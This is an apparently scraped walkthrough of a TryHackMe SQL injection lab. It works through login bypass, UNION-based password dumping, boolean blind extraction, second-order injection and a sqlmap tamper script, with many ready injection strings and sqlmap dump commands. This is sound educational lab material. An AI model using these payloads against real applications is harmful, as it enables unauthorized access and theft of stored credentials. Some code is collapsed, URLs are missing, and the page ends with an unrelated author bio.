This challenge uses the same query as in the previous challenge. However, the parameter expects a string instead of an integer, as can be seen here:


Since it expects a string, we need to modify our payload to bypass the login slightly. The following line will let us in:

1' or '1'='1'-- -

Bypass the login and retrieve the flag.

SQL Injection 3 and 4: URL and POST Injection

Here, the SQL query is the same as the previous one:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='10' AND password='ce5ca67...'

But in this case, the malicious user input cannot be injected directly into the application via the login form because some client-side controls have been implemented:

function validateform() {var profileID = document.inputForm.profileID.value;var password = document.inputForm.password.value;if (/^[a-zA-Z0-9]*$/.test(profileID) == false || /^[a-zA-Z0-9]*$/.test(password) == false) {alert("The input fields cannot contain special characters");return false;}if (profileID == null || password == null) {alert("The input fields cannot be empty.");return false;}}

The JavaScript code above requires that both the profileID and the password only contains characters between a-z, A-Z, and 0–9. Client-side controls are only there to improve the user experience and is in no way a security feature as the user has full control over the client and the data it submits. For example, a proxy tool such as Burp Suite can be used to bypass the client side JavaScript validation (https://portswigger.net/support/using-burp-to-bypass-client-side-javascript-validation).

Q.1:What is the flag for SQL Injection 1: Input Box Non-String?

SQL Injection Lab Tryhackme Writeup (82)
SQL Injection Lab Tryhackme Writeup (83)

Q.2:What is the flag for SQL Injection 2: Input Box String?

SQL Injection Lab Tryhackme Writeup (84)
SQL Injection Lab Tryhackme Writeup (85)

Q.3:What is the flag for SQL Injection 3: URL Injection?

This challenge uses a GET request when submitting the login form, as seen here:

SQL Injection Lab Tryhackme Writeup (86)

The login and the client-side validation can then easily be bypassed by going directly to this URL:' or 1=1 --a' or 1=1 --&password=a

The browser will automatically urlencode this for us. Urlencoding is needed since the HTTP protocol does not support all characters in the request. When urlencoded, the URL looks as follows:

Convert your payload into urlencode using HackBar 2 Extention

SQL Injection Lab Tryhackme Writeup (87)
SQL Injection Lab Tryhackme Writeup (88)

The %27 becomes the single quote (‘) character and %20 becomes a blank space.

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SQL Injection Lab Tryhackme Writeup (90)

Q.4:What is the flag for SQL Injection 4: POST Injection?

SQL Injection 4: POST Injection When submitting the login form for this challenge, it uses the HTTP POST method. It is possible to either remove/disable the JavaScript validating the login form or submit a valid request and intercept it with a proxy tool such as Burp Suite and modify it:

It means url will not show any parameter

that’s why we use burpsuite to see parameter and change it

SQL Injection Lab Tryhackme Writeup (91)

Capture the request

SQL Injection Lab Tryhackme Writeup (92)

Change the profileID with a’ or 1=1 —

SQL Injection Lab Tryhackme Writeup (93)

and click on forward

SQL Injection Lab Tryhackme Writeup (94)

Log in to the “SQL Injection 5: UPDATE Statement” challenge and exploit the vulnerable profile page to find the flag. The credentials that can be used are:

profileID: 10

password: toor

The same enumeration demonstrated for finding tables and column names must be done here since the flag is stored inside another table.

SQL Injection Lab Tryhackme Writeup (95)
SQL Injection Lab Tryhackme Writeup (96)

SQL Injection Attack on an UPDATE Statement

If a SQL injection occurs on an UPDATE statement, the damage can be much more severe as it allows one to change records within the database. In the employee management application, there is an edit profile page as depicted in the following figure.

SQL Injection Lab Tryhackme Writeup (97)

This edit page allows the employees to update their information, but they do not have access to all the available fields, and the user can only change their information. If the form is vulnerable to SQL injection, an attacker can bypass the implemented logic and update fields they are not supposed to, or for other users.

We will now enumerate the database via the UPDATE statement on the profile page. We will assume we have no prior knowledge of the database. By looking at the web page’s source code, we can identify potential column names by looking at the name attribute. The columns don’t necessarily need to be named this, but there is a good chance of it, and column names such as “email” and “password” are not uncommon and can easily be guessed.

SQL Injection Lab Tryhackme Writeup (98)

To confirm that the form is vulnerable and that we have working column names, we can try to inject something similar to the code below into the nickName and email field:


When injecting the malicious payload into the nickName field, only the nickName is updated. When injected into the email field, both fields are updated:

SQL Injection Lab Tryhackme Writeup (99)
SQL Injection Lab Tryhackme Writeup (100)

The first test confirmed that the application is vulnerable and that we have the correct column names. If we had the wrong column names, then non of the fields would have been updated. Since both fields are updated after injecting the malicious payload, the original SQL statement likely looks something similar to the following code:

UPDATE <table_name> SET nickName='name', email='email' WHERE <condition>

With this knowledge, we can try to identify what database is in use. There are a few ways to do this, but the easiest way is to ask the database to identify itself. The following queries can be used to identify MySQL, MSSQL, Oracle, and SQLite:

# MySQL and MSSQL',nickName=@@version,email='# For Oracle',nickName=(SELECT banner FROM v$version),email='# For SQLite',nickName=sqlite_version(),email='
SQL Injection Lab Tryhackme Writeup (101)
SQL Injection Lab Tryhackme Writeup (102)

Knowing what database we are dealing with makes it easier to understand how to construct our malicious queries. We can proceed to enumerate the database by extracting all the tables. In the code below, we perform a subquery to fetch all the tables from database and place them into the nickName field. The subquery is enclosed inside parantheses. The group_concat() function is used to dump all the tables simultaneously.

“The group_concat() function returns a string which is the concatenation of all non-NULL values of X. If parameter Y is present then it is used as the separator between instances of X. A comma (“,”) is used as the separator if Y is omitted. The order of the concatenated elements is arbitrary.”

',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
SQL Injection Lab Tryhackme Writeup (103)

By injecting the code above, we can see that the only table in the database is called “usertable” and “secrets”

SQL Injection Lab Tryhackme Writeup (104)

We can then continue by extract all the column names from the usertable:

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
SQL Injection Lab Tryhackme Writeup (105)

And as can be seen below, the usertable contains the columns: UID, name, profileID, salary, passportNr, email, nickName, and password:

SQL Injection Lab Tryhackme Writeup (106)

By knowing the names of the columns, we can extract the data we want from the database. For example, the query below will extract profileID, name, and passwords from secrets. The subquery is using the group_concat() function to dump all the information simultaneously, and the || operator is “concatenate” — it joins together the strings of its operands (sqlite.org).

',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
SQL Injection Lab Tryhackme Writeup (107)
SQL Injection Lab Tryhackme Writeup (108)

Boom ! we got flag

From the landing page on, go to Broken Authentication under Track: Vulnerable Startup (

SQL Injection Lab Tryhackme Writeup (109)

Bypass the login and retrieve the flag.

SQL Injection Lab Tryhackme Writeup (110)

This challenge builds upon the previous challenge. Here, the goal is to find a way to dump all the passwords in the database to retrieve the flag without using blind injection.

The login form is still vulnerable to SQL injection, and it is possible to bypass the login by using OR 1=1 — -as a username.

Before dumping all the passwords, we need to identify places where results from the login query is returned within the application. After logging in, the name of the currently logged-on user is displayed in the top right corner, so it might be possible to dump the data there, as seen here:

SQL Injection Lab Tryhackme Writeup (111)
SQL Injection Lab Tryhackme Writeup (112)

Data from the query could also be stored in the session cookie. It is possible to extract the session cookie by opening developer tools in the browser, which can be done by pressing F12. Then navigate to Storage and copy the value of the session cookie, as seen here:

SQL Injection Lab Tryhackme Writeup (113)

Then it is possible to decode the cookie at https://www.kirsle.net/wizards/flask-session.cgi or via a custom script. A script to decode the cookie can be downloaded inside the VM by going to

After having logged in with ‘ OR 1=1 — -as username, the decoded cookie can be seen below, and it is clear that the user id and username from the login query are placed inside it.

SQL Injection Lab Tryhackme Writeup (114)
SQL Injection Lab Tryhackme Writeup (115)

It is possible to dump the passwords by using a UNION based SQL injection. There are two key requirements that must be met for a UNION based injection to work:

  • The number of columns in the injected query must be the same as in the original query
  • The data types for each column must match the corresponding type

When logging in to the application, it executed the query below. From the SQL statement, we can see that it is retrieving two columns; id and username.

SELECT id, username FROM users WHERE username = '" + username + "' AND password = '" + password + "'

Try this one by one

SQL Injection Lab Tryhackme Writeup (116)
SQL Injection Lab Tryhackme Writeup (117)

it says Query executed .In this case, successful means that the application will successfully login when the correct number of columns is injected. In other cases, if error messages are enabled, a warning might be displayed saying “SELECTs to the left and right of UNION do not have the same number of result columns” when incorrect number of columns are injected.

By using ‘ UNION SELECT 1,2 — -as username, we match the number of columns in the original SQL query, and the application lets us in. After logging in, we can see that the username is replaced with the integer 2, which is what we used as column two in the injected query.

SQL Injection Lab Tryhackme Writeup (118)
SQL Injection Lab Tryhackme Writeup (119)

The same goes for the username in the session cookie. By decoding it, we can see that the username has been replaced with the same value as above

SQL Injection Lab Tryhackme Writeup (120)
SQL Injection Lab Tryhackme Writeup (121)

Enumerate the database to find tables and columns, as we did under Task 2 Introduction to SQL Injection. A cheat sheet such as PayloadsAllTheThings can be helpful for this. The challenge’s objective was to dump all the passwords to get the flag, so in this case, we will guess that the column name is password and that the table name is users. With this logic, it is possible to dump the passwords with the following code:

' UNION SELECT 1, password from users-- -
SQL Injection Lab Tryhackme Writeup (122)
SQL Injection Lab Tryhackme Writeup (123)

However, the previous statement will only return one password. The group_concat() function can help achieve the goal of dumping all the passwords simultaneously.

By injecting the following code into the username field:

' UNION SELECT 1,group_concat(password) FROM users-- -
SQL Injection Lab Tryhackme Writeup (124)

Boom ! we got Flag

This challenge has the same vulnerability as the previous one. However, it is no longer possible to extract data from the Flask session cookie or via the username display. The login form still has the same vulnerability, but this time the goal is to abuse the login form with blind SQL injection to extract the admin’s password.

Boolean-based blind SQL injection will be used to extract the password. Blind injections are tedious and time-consuming to do manually, so the plan is to build a script to extract the password character by character. Before making a script to automate the injection, it is vital to understand how the injection works. The idea is to send a SQL query asking true or false questions for each character in the password. The application’s response will be analyzed to understand whether the database returned true or false. In this case, the application will let us in if the response is successful, or it will stay on the login page saying, “Invalid username or password” in the case it returns false, as seen in the image below.

SQL Injection Lab Tryhackme Writeup (125)

As previously stated, we will want to send boolean questions to the database for each character in the password, asking the database whether we have guessed the correct character or not. To achieve this, we will need a way to control which character we are at and increment it every time we have guessed the correct character at the current position. SQLite’s substr function can help us achieve this functionality.

“The SQLite substr function returns a substring from a string starting at a specified position with a predefined length.” (SQLite Tutorial)

The first argument to substr is the string itself, which will be the admin’s password. The second argument is the starting position, and the third argument is the length of the substring that will be returned.

SUBSTR( string, <start>, <length>)

Below is an example of substr in action — the character after the equal (=) sign demonstrates the substring returned.

-- Changing startSUBSTR("THM{Blind}", 1,1) = TSUBSTR("THM{Blind}", 2,1) = HSUBSTR("THM{Blind}", 3,1) = M-- Changing lengthSUBSTR("THM{Blind}", 1,3) = THM

The next step will be to enter the admin’s password as a string into the substr function. This can be achieved with the following query:

(SELECT password FROM users LIMIT 0,1)

The LIMIT clause is used to limit the amount of data returned by the SELECT statement. The first number, 0, is the offset and the second integer is the limit:


Below are a few examples of the LIMIT clause in action. The right table represents the user table.

sqlite> SELECT password FROM users LIMIT 0,1THM{Blind}sqlite> SELECT password FROM users LIMIT 1,1Summer2019!sqlite> SELECT password FROM users LIMIT 0,2THM{Blind}Summer2019!


The SQL query to return the first character of the admin’s password can be seen here:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1)

Now we will need a way to compare the first character of the password with our guessed value. Comparing the characters are easy, and we could do it as follows:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = 'T'

However, whether this approach works or not will be depending on how the application handles the inputs. The application will convert the username to lowercase for this challenge, which breaks the mentioned approach since capital T is not the same as lowercase t. The hex representation of ASCII T is 0x54 and 0x74 for lowercase t. To deal with this, we can input our character as hex representation via the substitution type X and then use SQLite’s CAST expression to convert the value to the datatype the database expects.

“x,X: The argument is an integer which is displayed in hexadecimal. Lower-case hexadecimal is used for %x and upper-case is used for %X” — (sqlite.org)

This means that we can input T as X’54'. To convert the value to SQLite’s Text type, we can use the CAST expression as follows: CAST(X’54' as Text). Our final query now looks as follows:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)

Before using the query we have built, we will need to make it fit in with the original query. Our query will be placed in the username field. We can close the username parameter by adding a single quote (‘) and then append an AND operator to add our condition to it. Then append two dashes ( — ) to comment out the password check at the end of the query. With this done, our malicious query look as follows:

admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -

When this is injected into the username field, the final query executed by the database will be:

SELECT id, username FROM users WHERE username = 'admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)

If the application responds with a 302 redirect, then we have found the password’s first character. To get the entire password, the attacker must inject multiple tests for each character in the password. Testing every single character is tedious and is more easily achieved with a script. One easy solution is to loop over every possible ASCII character and compare it with the database’s character. The mentioned method generates a lot of traffic toward the target and is not the most efficient method. An example script is provided inside the machine and can be view and downloaded by going to; note that it will be necessary to change the password length with the password_len variable. The length of the password can be found by asking the database. For example, in the query below, we ask the database if the length of the password equals 37:

admin' AND length((SELECT password from users where username='admin'))==37-- -
SQL Injection Lab Tryhackme Writeup (126)
SQL Injection Lab Tryhackme Writeup (127)

Also, the script requires an unnecessary amount of requests. An extra challenge could be to build a more efficient tool to retrieve the password.

An alternative way to solve this challenge is by using a tool such as sqlmap, which is an open source tool that automates the process of detecting and exploiting SQL injection flaws. The following command can be used to exploit the vulnerability with sqlmap:

sqlmap -u --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
SQL Injection Lab Tryhackme Writeup (128)


Here, the previous vulnerabilities have been fixed, and the login form is no longer vulnerable to SQL injection. The team has added a new note function, allowing users to add notes on their page. The goal of this challenge is to find the vulnerability and dump the database to find the flag.


By registering a new account and logging in to the application, the user can navigate to the new note function by clicking “Notes” in the top left menu. Here, it is possible to add new notes, and all the user’s notes are listed on the bottom of the page, as seen here:

SQL Injection Lab Tryhackme Writeup (129)

The notes function is not directly vulnerable, as the function to insert notes is safe because it uses parameterized queries. With parameterized queries, the SQL statement is specified first with placeholders (?) for the parameters. Then the user input is passed into each parameter of the query later. Parameterized queries allow the database to distinguish between code and data, regardless of the input.

INSERT INTO notes (username, title, note) VALUES (?, ?, ?)

Even though parameterized queries are used, the server will accept malicious data and place it in the database if the application does not sanitize it. Still, the parameterized query prevents the input from leading to SQL injection. Since the application might accept malicious data, all queries must use parameterized queries, and not only for queries directly accepting user input.

The user registration function also utilizes parameterized queries, so when the query below is executed, only the INSERT statement gets executed. It will accept any malicious input and place it in the database if it doesn’t sanitize it, but the parameterized query prevents the input from leading to SQL injection.

INSERT INTO users (username, password) VALUES (?, ?)

However, the query that fetches all of the notes belonging to a user does not use parameterized queries. The username is concatenated directly into the query, making it vulnerable to SQL injection.

SELECT title, note FROM notes WHERE username = '" + username + "'

This means that if we register a user with a malicious name, everything will be fine until the user navigates to the notes page and the unsafe query tries to fetch the data for the malicious user.

By creating a user with the following name:

' union select 1,2'

We should be able to trigger the secondary injection:

SQL Injection Lab Tryhackme Writeup (130)

With this username, the application performs the following query:

SELECT title, note FROM notes WHERE username = '' union select 1,2''

Then on the notes page as the new user, we can see that the first column in the query is the note title, and the second column is the note itself:

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With this knowledge, this is rather easy to exploit. For example, to get all the tables from the database, we can create a user with the name:

' union select 1,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%''

To find the flag among the passwords, register a user with the name:

‘ union select 1,group_concat(password) from users’

Automating Exploitation Using Sqlmap

It is possible to use sqlmap to automate this attack, but a standard attack with sqlmap will fail. The injection happens at the user registration, but the vulnerable function is located on the notes page. For sqlmap to exploit this vulnerability, it must do the following steps:

  1. Register a malicious user
  2. Login with the malicious user
  3. Go to the notes page to trigger the injection

It is possible to achieve all of the necessary steps by creating a tamper script. Sqlmap supports tamper scripts, which are scripts used for tampering with injection data. With a tamper script, we can easily modify the payload, for example, adding a custom encoding to it. It also allows us to set other things, such as cookies.

There are two custom functions in the tamper script below. The first function is create_account(), which register a user with sqlmap’s payload as name and ‘asd’ as password. The next custom function is login(), which logs sqlmap in as the newly created user and returns the Flask session cookie. tamper() is the main function in the script, and it has the payload and **kwargs as arguments. **kwargs holds information such as the HTTP headers, which we need to place the Flask session cookie onto the request to allow sqlmap to go to the notes page to trigger the SQL injection. The tamper() function first gets the headers from kwargs, then creates a new user on the application, and then it logs in to the application and sets the Flask session onto the HTTP header object.

#!/usr/bin/pythonimport requestsfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALaddress = ""password = "asd"def dependencies():passdef create_account(payload):with requests.Session() as s:data = {"username": payload, "password": password}resp = s.post(f"{address}/signup", data=data)def login(payload):with requests.Session() as s:data = {"username": payload, "password": password}resp = s.post(f"{address}/login", data=data)sessid = s.cookies.get("session", None)return "session={}".format(sessid)def tamper(payload, **kwargs):headers = kwargs.get("headers", {})create_account(payload)headers["Cookie"] = login(payload)return payload

The folder where the tamper script is located will also need an empty __init__.py file for sqlmap to be able to load it. Before starting sqlmap with the tamper script, change the address and password variable inside the script. With this done, it is possible to exploit the vulnerability with the following command:

sqlmap --tamper so-tamper.py --url --data "username=admin&password=asd"--second-url -p username --dbms sqlite --technique=U --no-cast# --tamper so-tamper.py - The tamper script# --url - The URL of the injection point, which is /signup in this case# --data - The POST data from the registraion form to /signup.# Password must be the same as the password in the tamper script# --second-url - Visit this URL to check for results# -p username - The parameter to inject to# --dbms sqlite - To speed things up# --technique=U - The technique to use. [U]nion-based# --no-cast - Turn off payload casting mechanism

Dumping the users table might be hard without turning off the payload casting mechanism with the — no-cast parameter. An example of the difference between casting and no casting can be seen here:

— With casting enabled:

admin' union all select min(cast(x'717a717071' as text)||coalesce(cast(sql as text),cast(x'20' as text)))||cast(x'716b786271' as text),null from sqlite_master where tbl_name=cast(x'7573657273' as text)-- daqo'-- 7573657273 is 'users' in ascii

— Without casting:

admin' union all select cast(x'717a6a7871' as text)||id||cast(x'6774697a7462' as text)||password||cast(x'6774697a7462' as text)||username||cast(x'7162706b71' as text),null from users-- ypfr'

When sqlmap asks, answer no to follow 302 redirects, then answer yes to continue further testing if it detects some WAF/IPS. Answer no when asked if you want to merge cookies in future requests, and say no to reduce the number of requests. As seen in the image below, sqlmap was able to find the vulnerability, which allows us to automate the exploitation of it.

SQL Injection Lab Tryhackme Writeup (132)

The flag can then be found by dumping the users table:

sqlmap --tamper tamper/so-tamper.py --url --data "username=admin&password=asd" --second-url -p username --dbms=sqlite --technique=U --no-cast -T users --dump

Sqlmap is quite noisy and will add a lot of users attempting to exploit this application. Because of this, the output will be trimmed and the message below can be seen.

[WARNING] console output will be trimmed to last 256 rows due to large table size

However, all the data is saved and written to a dump file, as seen in the image below. Read the top of the dump file to get the flag:

SQL Injection Lab Tryhackme Writeup (133)

NB: The flag will differ on the live system.

Exploit the vulnerable function and retrieve the flag.

What is the flag for this challenge?

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SQL Injection Lab Tryhackme Writeup (136)

add “-T users — dump” in the last

sqlmap --tamper so-tamper.py --url --data "username=admin&password=asd" --second-url -p username --dbms=sqlite --technique=U --no-cast -T users --dump
SQL Injection Lab Tryhackme Writeup (137)

For this challenge, the vulnerability on the note page has been fixed. A new change password function has been added to the application, so the users can now change their password by navigating to the Profile page. The new function is vulnerable to SQL injection because the UPDATE statement concatenates the username directly into the SQL query, as can be seen below. The goal here is to exploit the vulnerable function to gain access to the admin’s account.

The developer has used a placeholder for the password parameter because this input comes directly from the user. The username does not come directly from the user but is rather fetched from the database based on the user id stored in the session object. Therefore, the developer has thought that the username was safe to use and concatenated it directly into the query instead of using a placeholder:

UPDATE users SET password = ? WHERE username = '" + username + "'

To exploit this vulnerability and gain access to the admin’s user account, we can create a user with the name admin'-- -.

After having registered the malicious user, we can update the password for our new user to trigger the vulnerability. When changing the password, the application executes two queries. First, it asks the database for the username and password for our current user:

SELECT username, password FROM users WHERE id = ?

If all checks are fine, it will try to update the password for our user. Since the username gets concatenated directly into the SQL query, the executed query will look as follows:

UPDATE users SET password = ? WHERE username = 'admin' -- -'

This means that instead of updating the password for admin' -- -, the application updated the password for the admin user. After having updated the password, it is possible to log in as admin with the new password and view the flag.

Create a new user and exploit the vulnerability in the update password function to access the admin account to get the flag.

Lets create new user with admin’ — -:asd

SQL Injection Lab Tryhackme Writeup (138)

Now Login into the user admin’ — -:asd

SQL Injection Lab Tryhackme Writeup (139)

After login goto profile page and change password with this query

old password = asd

new password = pass

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yes password has been changed now login into admin as admin:pass

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BOOM ! We got Flag

A new function has been added to the page, and it is now possible to search books in the database. The new search function is vulnerable to SQL injection because it concatenates the user input directly into the SQL statement. The goal of the task is to abuse this vulnerability to find the hidden flag.

When the user first logs into the challenge, they are presented with a message saying:

Testing a new function to search for books, check it out here

The ‘here’ text is a link taking the user to, which is the page containing the vulnerable search function and can be seen here:

SQL Injection Lab Tryhackme Writeup (143)

The web page performs a GET request with the parameter title when searching for a book. The query it performs can be seen here:

SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '" + title + "%')

All we need to do to abuse this is closing the LIKE operand to the right of the LIKE operator. For example, we can dump all the books in the database by injecting the following command:

') or 1=1-- -

Use what you learned about UNION-based SQL injection and exploit the vulnerable book search function to retrieve the flag.

Create new user sam2:asd

and login into account

SQL Injection Lab Tryhackme Writeup (144)

we can dump all the books in the database by injecting the following command:

') or 1=1-- -
SQL Injection Lab Tryhackme Writeup (145)

Without knowing the number of columns upfront, the attacker must first enumerate the number of columns by systematically injecting queries with different numbers of columns until it is show error. For example:

Try every one by one every payload

') order by 1-- -
') order by 2-- -
') order by 3-- -
') order by 4-- -
') order by 5-- -
SQL Injection Lab Tryhackme Writeup (146)

when i try

') order by 5-- -
SQL Injection Lab Tryhackme Writeup (147)

It did’nt show me anything it means this is error for attacker

it means in the database there is 4 columns only

Lets’ Check how many columns are vulnerable to do this we use UNION SELECT

') union select 1,2,3,4-- -
SQL Injection Lab Tryhackme Writeup (148)

the query shows 3 columns are vulnerable {2,3,4} position

lets fetch the information from the database

if you know mysql you can easly understand this query

') union select 1,group_concat(username),group_concat(password),4 from users-- -
SQL Injection Lab Tryhackme Writeup (149)

In this challenge, the application performs a query early in the process. It then uses the result from the first query in the second query later without sanitization. Both queries are vulnerable, and the first query can be exploited through blind SQL injection. However, since the second query is also vulnerable, it is possible to simplify the exploitation and use UNION based injection instead of Boolean-based blind injection; making the exploitation easier and less noisy. The goal of the task is to abuse this vulnerability without using blind SQL injection and retrieve the flag.

When the user first logs into the challenge, they are presented with a message saying:

Testing a new function to search for books, check it out here

The ‘here’ text is a link taking the user to, which is the page containing the vulnerable search function and can be seen here:

SQL Injection Lab Tryhackme Writeup (150)

When searching for a book title, the web page performs a GET request. The application then performs two queries where the first query gets the book’s ID, then later on in the process, a new SQL query is performed to get all information about the book. The two queries can be seen here:

bid = db.sql_query(f"SELECT id FROM books WHERE title like '{title}%'", one=True)if bid:query = f"SELECT * FROM books WHERE id = '{bid['id']}'"

First, we will limit the result to zero rows, which can be done by not giving it any input or input we know does not exist. Then we can use the UNION clause to control what the first query returns, which is the data that will be used in the second query. Meaning that we can inject the following value into the search field:

' union select 'STRING

After injecting the code above, the application will perform the following SQL queries:

SQL Injection Lab Tryhackme Writeup (151)

From queries, we can see that the result from query one is STRING%, which is used in the WHERE clause of the second query.

If we replace ‘STRING with a number that exists in the database, the application should return a valid object. However, the application adds a wildcard (%) to the string, meaning that we must comment out the wildcard first. The wildcard can be commented out by appending ‘ — — to the end of the string we are injecting. For example, if we inject the following line:

' union select '1'-- -

The application should display the book with ID 1 back to the user, as seen here:

SQL Injection Lab Tryhackme Writeup (152)

If we did not limit the result to zero rows first, we would not have gotten the output of the UNION statement but rather the content from the LIKE clause. For example, by injecting the following string:

test' union select '1'-- -

The application would have executed the following queries:.

SQL Injection Lab Tryhackme Writeup (153)

Now that we have full control of the second query, we can use UNION-based SQL injection to extract data from the database. The goal is to make the second query look something similar to the following query:

SELECT * FROM books WHERE id = '' union select 1,2,3,4-- -

Making the application execute the query above should be as easy as injecting the following query:

' union select '1' union select 1,2,3,4-- -

However, we are closing the string that is supposed to be returned by appending the single quote (‘) before the second UNION clause. To make the query work and return our second UNION clause, we will have to escape the single quote. Escaping the single quote can be done by doubling up the quote (‘’). After having doubled the quotes, we have the following string:

' union select '-1''union select 1,2,3,4-- -

Injecting the string above will return the page seen here:

SQL Injection Lab Tryhackme Writeup (154)

Use what you learned about UNION-based SQL injection and exploit the vulnerable book search function to retrieve the flag

' union select '-1''union select 1,group_concat(username),group_concat(password),4 from users-- -
SQL Injection Lab Tryhackme Writeup (155)

BOOM ! we Got Final Flag

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

SQL Injection Lab Tryhackme Writeup (156)

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SQL Injection Lab Tryhackme Writeup (2024)
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Name: Manual Maggio

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Introduction: My name is Manual Maggio, I am a thankful, tender, adventurous, delightful, fantastic, proud, graceful person who loves writing and wants to share my knowledge and understanding with you.